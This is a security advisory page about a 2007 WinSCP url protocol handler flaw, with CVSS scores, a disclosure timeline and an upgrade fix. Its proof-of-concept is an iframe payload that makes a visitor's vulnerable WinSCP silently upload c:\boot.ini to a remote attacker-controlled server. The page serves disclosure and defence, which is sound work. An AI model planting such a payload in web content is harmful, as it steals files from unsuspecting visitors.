WinSCP < 4.04 url protocol handler flaw

2007-09-18 / 2007-09-19
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-Affected products: WinSCP 4.03 and older -Details: By default WinSCP installs url protocol handlers for the scp:// and sftp:// protocols. These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically download files from a remote server to the local system. Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack. -PoC: On a machine you control set up an scp-only account with the username "scp" with any password. Place this on a website: <iframe src='scp:password (at) yourhost (dot) com [email concealed]:" /console /command "option confirm off" "put c:\boot.ini" close exit "'/> This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed. Downloading a file from the server to any location writable by the current user also works. -Tested on: IE6 & IE7 works. FF older than 2.0.0.5 works. FF 2.0.0.5 and newer show a confirmation dialog before executing WinSCP. -Solution Upgrade to version 4.04 or higher from http://winscp.net/download.php -Timeline 24-Jul-2007 Vulnerability reported to Martin Prikryl 25-07-2007 Proposed fix to Martin 31-07-2007 Response from Martin 01-09-2007 Martin confirms fix 02-09-2007 New version done 06-09-2007 WinSCP v4.04 released


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top